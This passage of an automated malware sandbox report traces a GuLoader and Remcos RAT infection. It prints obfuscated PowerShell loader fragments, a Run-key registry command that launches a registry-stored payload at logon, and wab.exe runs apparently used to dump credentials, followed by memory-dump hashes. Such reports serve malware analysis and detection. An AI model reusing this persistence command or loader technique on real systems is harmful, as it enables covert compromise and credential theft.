;$Ascon=$Strubelydene187[$Skrivebordsteoriers];}$Omnivoracity=340878;$Lehrman=25696;Unisexes (Ivywood 'C$ g lSoBb aXlE:,FCi,l tGe,rSa.bIl e, =U KGDe.t -UCDo nUtFe.nAt t$HFLo r mMa sTtIeDl,s e ');Unisexes (Ivywood 'I$.gElDo.b,aPlT:.KCu nPsGtTkPr iFt iFkNe rTeCnBs, I=O [ S yNs t.e,m .FC o.nAv e r tS].: :HFRr oSm BSaPsLeA6R4FSFtSr i,nAgT( $HF iGlRtKeSrVa,b.l eT)R ');Unisexes (Ivywood ' $Cgcl o,bAa,l : USn p uTr.cIh aSs,eHdP ,=T [MS.yDs.tVeCmT. TleAxStP..ESn cRo d i.nIg.] :.: A SUCMI I..RG,eMt SRt r iAn g,(B$BKPu n,sUt k r iPtKi.kGeFrSeKnSs )M ');Unisexes (Ivywood 'C$,g,lDoSb aTlK: HSyTtUt e hRo.lidDsA=K$HU nEpTuHr c h aFsBe d .Ps u.b.sftSr iSnMg.(,$FONm,nPi vKo r a c.iFtEy ,A$PLTeEhMr m a n )B ');Unisexes $Hytteholds;"
                                    Imagebase:0x590000
                                    File size:433'152 bytes
                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.2561951332.0000000009D33000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:high
                                    Has exited:true

                                    Target ID:6
                                    Start time:09:37:12
                                    Start date:01/07/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Kasinoerne.Pri && echo t"
                                    Imagebase:0x1c0000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:11
                                    Start time:09:37:36
                                    Start date:01/07/2024
                                    Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                    Imagebase:0x830000
                                    File size:516'608 bytes
                                    MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000003.2574264775.00000000050D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000003.2567181749.00000000050D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.3430254752.00000000050D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000B.00000002.3423964489.0000000004633000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:high
                                    Has exited:false

                                    Target ID:12
                                    Start time:09:37:38
                                    Start date:01/07/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Likvidationsprovenuet" /t REG_EXPAND_SZ /d "%Hippenes% -w 1 $Ellis=(Get-ItemProperty -Path 'HKCU:\Redistributing\').Katalognavnet;%Hippenes% ($Ellis)"
                                    Imagebase:0x1c0000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:13
                                    Start time:09:37:38
                                    Start date:01/07/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:14
                                    Start time:09:37:38
                                    Start date:01/07/2024
                                    Path:C:\Windows\SysWOW64\reg.exe
                                    Wow64 process (32bit):true
                                    Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Likvidationsprovenuet" /t REG_EXPAND_SZ /d "%Hippenes% -w 1 $Ellis=(Get-ItemProperty -Path 'HKCU:\Redistributing\').Katalognavnet;%Hippenes% ($Ellis)"
                                    Imagebase:0xb40000
                                    File size:59'392 bytes
                                    MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:true

                                    Target ID:15
                                    Start time:09:37:45
                                    Start date:01/07/2024
                                    Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\osoptnuuxvymkrhp"
                                    Imagebase:0x830000
                                    File size:516'608 bytes
                                    MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:16
                                    Start time:09:37:45
                                    Start date:01/07/2024
                                    Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\osoptnuuxvymkrhp"
                                    Imagebase:0x830000
                                    File size:516'608 bytes
                                    MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:17
                                    Start time:09:37:45
                                    Start date:01/07/2024
                                    Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\zubatgfwldqymxdteee"
                                    Imagebase:0x830000
                                    File size:516'608 bytes
                                    MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:18
                                    Start time:09:37:45
                                    Start date:01/07/2024
                                    Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\bohsuyqpzlidxdrfvpzguz"
                                    Imagebase:0x830000
                                    File size:516'608 bytes
                                    MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Reset < >
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2682247944.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_7ffd348a0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c3d4d71e556e4375309295c7478d5acb76c122ef12b92cd493f132eb11ab5c9a
                                      • Instruction ID: 0c9aea6628e9ced44632439acf89296027de1139460aed4c5fd9195f83783acf
                                      • Opcode Fuzzy Hash: c3d4d71e556e4375309295c7478d5acb76c122ef12b92cd493f132eb11ab5c9a
                                      • Instruction Fuzzy Hash: E6F1B730A19A8D8FEBA8DF2CC8557E937E1FF55310F04426ED84DC7291DB78A9419B82
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2682247944.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_7ffd348a0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3b0044aa709ac815fa2145311bf7d7e22a303b91737ef4160a00a40fe9cf2ee8
                                      • Instruction ID: 2f3b887423c6cdcaf3d51caeb70f5801eafbd55a565ef5938bed546788e0f4d9
                                      • Opcode Fuzzy Hash: 3b0044aa709ac815fa2145311bf7d7e22a303b91737ef4160a00a40fe9cf2ee8
                                      • Instruction Fuzzy Hash: A6E1A330A09A8D8FEBA8DF2CC8657E977E1FF55310F04426AE84DC7295DB78A9418781
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2682247944.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_7ffd348a0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 97945d42a3f7aff69e3ed38404cf1acb81e7df58a93d441890e21cab08b16dce
                                      • Instruction ID: e60019c953f1bedc5d6fe8f60da28b2549e91b5d369656e929a7a683d75f45ec
                                      • Opcode Fuzzy Hash: 97945d42a3f7aff69e3ed38404cf1acb81e7df58a93d441890e21cab08b16dce
                                      • Instruction Fuzzy Hash: 04F1C331A09A4D8FDFD8EF5CC4A5AA977F1FF69300F14416AD449D7296CA78E881CB80
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2682902464.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_7ffd34970000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 044e433be16a4bb47ea49ba2e4c79a00b9f092bc1c253cb27af9a9c1500035db
                                      • Instruction ID: 601f585fa9d9dd1a46b6e3a0b0539920e70f80420a3d58b325e0ce2d7e85a167
                                      • Opcode Fuzzy Hash: 044e433be16a4bb47ea49ba2e4c79a00b9f092bc1c253cb27af9a9c1500035db
                                      • Instruction Fuzzy Hash: B911B731B0D94A4FE795DB5C98B05A477E2FF85324B5840BAE10CC31A7DE2DEC458700
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2682902464.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_7ffd34970000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1f48bb033126da55f2ae7e638639f554260fc8e97c579a5d561b11cef5bd5a42
                                      • Instruction ID: 93811bc91cebde4611ab9f6d1ab75bbae157ffbef35c6d876dae9a32d8e41b84
                                      • Opcode Fuzzy Hash: 1f48bb033126da55f2ae7e638639f554260fc8e97c579a5d561b11cef5bd5a42
                                      • Instruction Fuzzy Hash: E7012622F1EA5A0BF3A5A69C6CA51B8B6D2FF55B10B4941FAE40CD3197ED1C7C009391
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2682247944.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_7ffd348a0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                      • Instruction ID: aff2cc03dc7dc4a920766b02131dbf81e79ecbd7a63877e6cbf50e5921a8226b
                                      • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                      • Instruction Fuzzy Hash: A501677121CB0C4FD748EF4CE451AA5B7E0FB99364F10056DE58AC3651DA36E881CB45
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2682247944.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_7ffd348a0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 48384576d70f9e0ca65dbbbb63afc7938e952a0c18acc7cb0ba77baaa94a2e71
                                      • Instruction ID: 4b35492db65c5e609c23c96dfb6a3b77efe6aa6075a4ba1d6b8b998ee6f40bc3
                                      • Opcode Fuzzy Hash: 48384576d70f9e0ca65dbbbb63afc7938e952a0c18acc7cb0ba77baaa94a2e71
                                      • Instruction Fuzzy Hash: 29417167B0E7D26FF7539B2C98B60D67FA0DE6326170900B7CAD4CA093D91C1817A762
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2559284446.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_79c0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (f)l$(f)l$(f)l$(f)l$(f)l$(f)l$(f)l$(f)l
                                      • API String ID: 0-653163401
                                      • Opcode ID: 3f60c492f1f4d48027cc5d2da06cf5b39405fd534debd46ea53e2af5c917982e
                                      • Instruction ID: d9ff0821e92d10645e080d4bf510dc5445ba316c7616b81f8ca30cd3ada10092
                                      • Opcode Fuzzy Hash: 3f60c492f1f4d48027cc5d2da06cf5b39405fd534debd46ea53e2af5c917982e
                                      • Instruction Fuzzy Hash: AB72A2B0A00219DFDF24CB98C951B6ABBB2BF85304F1484ADD915AB745CB71ED41CF92
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2559284446.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_79c0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (f)l$(f)l$(f)l$(f)l$(f)l
                                      • API String ID: 0-2295323125
                                      • Opcode ID: 07d4984e86a10ced0fd74d913149939807eb77fb86269e8141a3d28e7b8c7a50
                                      • Instruction ID: 7990714f30335921f168f8cc224e15d3575d6a1beb0f7c6ea423be77dc6d6eac
                                      • Opcode Fuzzy Hash: 07d4984e86a10ced0fd74d913149939807eb77fb86269e8141a3d28e7b8c7a50
                                      • Instruction Fuzzy Hash: 5E723BB4A00209DFDB14CB58C555A6EB7F2EF89308F15C069D919AF395CB72EC41CB92
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2559284446.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_79c0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (f)l$(f)l$(f)l$(f)l
                                      • API String ID: 0-301953305
                                      • Opcode ID: dece6053b311d4985c65cbb77a9da1d93f2fe03de6921bf15fb5ec986764f6a6
                                      • Instruction ID: 28ac7d52452628d3f0c917ad2a85d15fef58a82bdedf9aca1589617d0c5fc35e
                                      • Opcode Fuzzy Hash: dece6053b311d4985c65cbb77a9da1d93f2fe03de6921bf15fb5ec986764f6a6
                                      • Instruction Fuzzy Hash: 1AB182B0B00205EBDB14DB65C955B6EBBF7AF89304F108469D905AF395CB72EC41CB92
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2559284446.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_79c0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (f)l$(f)l
                                      • API String ID: 0-4050134360
                                      • Opcode ID: 4e80b3a996b90583454c106c0e3def9b57023b7fa42f96f05f65a9a234bf9318
                                      • Instruction ID: 87791ddf69873664a862e1c1c4ebbfa433e7b37be77ecf3f52749f1e9d5cfdc7
                                      • Opcode Fuzzy Hash: 4e80b3a996b90583454c106c0e3def9b57023b7fa42f96f05f65a9a234bf9318
                                      • Instruction Fuzzy Hash: 6162AEB1B00209DFDB14CB68C550AAEBBB6BF89318F14C06ED9199B345CB71DD41CBA2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2559284446.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_79c0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (f)l$(f)l
                                      • API String ID: 0-4050134360
                                      • Opcode ID: 02a79f9be5dc5b275920653e9e54bf4ee9ab6890af00e557e227ab86591c0dd9
                                      • Instruction ID: 2f5c00da77491fef1c4a519079c86cb98550b9fe84da820cdaf9d456bba4b1f3
                                      • Opcode Fuzzy Hash: 02a79f9be5dc5b275920653e9e54bf4ee9ab6890af00e557e227ab86591c0dd9
                                      • Instruction Fuzzy Hash: F14229B4A003059FDB14CB58C645B6EB7B2EF89308F15C199D919AF396CB72ED42CB81
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2559284446.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_79c0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (f)l$(f)l
                                      • API String ID: 0-4050134360
                                      • Opcode ID: ab8c1ce57a9b096046eb91b9028471a0cfbf208536cf96037b5b308dc9be04f2
                                      • Instruction ID: 0ea38db78bac907189de78450612ba644bb802126723d8cbac70156e1000ee99
                                      • Opcode Fuzzy Hash: ab8c1ce57a9b096046eb91b9028471a0cfbf208536cf96037b5b308dc9be04f2
                                      • Instruction Fuzzy Hash: 38122AB4A00205DFDB14CF58C655A6DB7B2EF89308F15C0A9DA199F396CB72ED42CB81
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2559284446.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_79c0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (f)l$(f)l
                                      • API String ID: 0-4050134360
                                      • Opcode ID: aeed55f710c412e23823457152154ca252eed35d8d447458d3a0de28c929f07e
                                      • Instruction ID: 1ae706a7ff8b4feb455796ff7734bc91bcdc255bd7124fe56d94b2b5d1e54212
                                      • Opcode Fuzzy Hash: aeed55f710c412e23823457152154ca252eed35d8d447458d3a0de28c929f07e
                                      • Instruction Fuzzy Hash: CBF1B374A002199FEB24DB64C851F6EB7B2AF85304F1480A9DA09AF791CB71ED818F51
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2559284446.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_79c0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (f)l$(f)l
                                      • API String ID: 0-4050134360
                                      • Opcode ID: 445230a096e5bce268bbd43a5c129e7e75fd79c50427ad06428e35784ea68368
                                      • Instruction ID: aac997e2a07361d2db7579afac13dd17224f594bc99c9f8126b2095892415f22
                                      • Opcode Fuzzy Hash: 445230a096e5bce268bbd43a5c129e7e75fd79c50427ad06428e35784ea68368
                                      • Instruction Fuzzy Hash: 23A193B4A00205EFDB14DB65C955BAEBBF7AF89304F10846DE5056B395CB32EC40CB92
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2559284446.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_79c0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (f)l
                                      • API String ID: 0-148528583
                                      • Opcode ID: e3f4cb9ac28bd1ce26367acd7cbe846500b18bcdb814173feb6a3ea0885dcf5a
                                      • Instruction ID: 87528008560a6f83ab55ff1818b20a43fc821a2a8821badb8c630dbe229accfb
                                      • Opcode Fuzzy Hash: e3f4cb9ac28bd1ce26367acd7cbe846500b18bcdb814173feb6a3ea0885dcf5a
                                      • Instruction Fuzzy Hash: 2DF12CB4A00205AFDB14CF58C591F6EB7B6FF89318F14C099E905AB395C672ED41CB51
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2559284446.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_79c0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (f)l
                                      • API String ID: 0-148528583
                                      • Opcode ID: e50e957345a3f85210ff649b69500ca660276fb87c9aea27317ece850b25fc63
                                      • Instruction ID: f94d9be09506be0c365bf0c8618d0b2dcb12b30a8e24ef3ad5436d382571bc76
                                      • Opcode Fuzzy Hash: e50e957345a3f85210ff649b69500ca660276fb87c9aea27317ece850b25fc63
                                      • Instruction Fuzzy Hash: 60F14AB4A00205AFDB14CF58C591EAEBBB6BF89318F14C0A9E919AB351C772ED41CB51
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2559284446.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_79c0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 84'l
                                      • API String ID: 0-2843270408
                                      • Opcode ID: 567289f4f8e7e988f4fc122d38d3c751b6347fb9734780b13e1657f6d50f6b72
                                      • Instruction ID: a6100bcda74df292287ac691d1d43a1394b60ac3cedac1d335c3a3035ad83250
                                      • Opcode Fuzzy Hash: 567289f4f8e7e988f4fc122d38d3c751b6347fb9734780b13e1657f6d50f6b72
                                      • Instruction Fuzzy Hash: 7C4126F47053C59FCF12CF54C920A26BFB1AF86618F09849AE9449F2A6C631DD05C7A2
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2559284446.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_79c0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6fa42b35a0a5a7d3b732482a83db2ab0bd570d7ae77458d4c2d907931bd901ff
                                      • Instruction ID: cc4e7740808282e6be39d24dbe983dfc731c98f5ddc72e8f3740df61115ef69a
                                      • Opcode Fuzzy Hash: 6fa42b35a0a5a7d3b732482a83db2ab0bd570d7ae77458d4c2d907931bd901ff
                                      • Instruction Fuzzy Hash: B27257F1B043458FDF15CB69841276ABBE6AFC2218F1484BFD949CB652DA32C841C7A3
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2559284446.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_79c0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 71aca4691d951c5cb816e7007428a514ebb538f82388b0967b49ac72b82737fd
                                      • Instruction ID: d2fbb10cfbecbb7817698e1e20e2ab23c05d818e004652a5cca1330ba1d754ad
                                      • Opcode Fuzzy Hash: 71aca4691d951c5cb816e7007428a514ebb538f82388b0967b49ac72b82737fd
                                      • Instruction Fuzzy Hash: EBF13AB17002468FDF25CF69851066ABBE6AFC6328F14807FD915CB292DB31E945C763
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2559284446.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_79c0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 415dfcf9c623edb815a7a35aad40f21e035f379ddddab0ad99ac8d8e210039c3
                                      • Instruction ID: f79943a07ead56692604d059edd0ad423c813a0f89843201417e28f13c6c746f
                                      • Opcode Fuzzy Hash: 415dfcf9c623edb815a7a35aad40f21e035f379ddddab0ad99ac8d8e210039c3
                                      • Instruction Fuzzy Hash: E8F12BB1704246DFDF25CE25C82166ABFB6AF82214F14C4AFD855CB2A2DB31C945C7A3
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2559284446.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_79c0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a803add7e60bdc910fc04fd9ff1cb2622f17af6c20091a9c246c59dfa56fe3a9
                                      • Instruction ID: 120220b121c2c562bae9f42302df1dabf95f13ea84c0119dcf18d3f36c8b06a3
                                      • Opcode Fuzzy Hash: a803add7e60bdc910fc04fd9ff1cb2622f17af6c20091a9c246c59dfa56fe3a9
                                      • Instruction Fuzzy Hash: 38D179B170030A9FDF15CB75881476ABBE69FC2328F1484AED946DB295DA31E940C7A3
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2559284446.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_79c0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 369a3500d61a409950167f8517d12543cf4f0325d19be63b355227b1c9fd5083
                                      • Instruction ID: f1683a8edb5c22ed18709433f4d9409e0f1f88c2793f1b758df294537bb77327
                                      • Opcode Fuzzy Hash: 369a3500d61a409950167f8517d12543cf4f0325d19be63b355227b1c9fd5083
                                      • Instruction Fuzzy Hash: 2FD1ACB4A00209EFDB14DB68C455FAEBBB6AF89314F10C429E9156F385CB71EC458B92
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2559284446.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_79c0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: be64de0d3357e2b456a3d73b4f6cab4f766482de6af85b3fe5907fb7eb11fcb0
                                      • Instruction ID: 9689d028dbcab45874393ad92f5bd4adf2e43e2a7c2b289afb8ae2cfb60534fa
                                      • Opcode Fuzzy Hash: be64de0d3357e2b456a3d73b4f6cab4f766482de6af85b3fe5907fb7eb11fcb0
                                      • Instruction Fuzzy Hash: FEB1CCB4A00205DFDB14DF64C450FAEBBB6AF89308F14C429D9156F396CB75E885CB92
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2559284446.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_79c0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 569a30ebafc1198a6f094916b7636c0f76d3d49be955fb20a5b8f39f1548d6b8
                                      • Instruction ID: 4ae968540936d606dc71254aa044b63b12ba5c496bfbf7fa40cff406a8942909
                                      • Opcode Fuzzy Hash: 569a30ebafc1198a6f094916b7636c0f76d3d49be955fb20a5b8f39f1548d6b8
                                      • Instruction Fuzzy Hash: 2E41F7F0B003029FCF10CF258594B6AB7EAAF82368F1884ADD905DB295D731E945CB63
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2559284446.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_79c0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b481cb208271b3b91c66af2ec128569b89eb765f5beea0e931fb9d6079815ba4
                                      • Instruction ID: 4a11fd2a8b75c8b352dea700bdfb7747b9f03ac9403ed73765d9ab728d3a038e
                                      • Opcode Fuzzy Hash: b481cb208271b3b91c66af2ec128569b89eb765f5beea0e931fb9d6079815ba4
                                      • Instruction Fuzzy Hash: 6341D3F1A00342EFDF20CF658512A7EBBAAAF95259F188099D9149F252D732D940C763
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2559284446.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_79c0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c2d3300b66703c3321ff9c215eed56b6d070eb8a964f7009b28e8ea45d2ec796
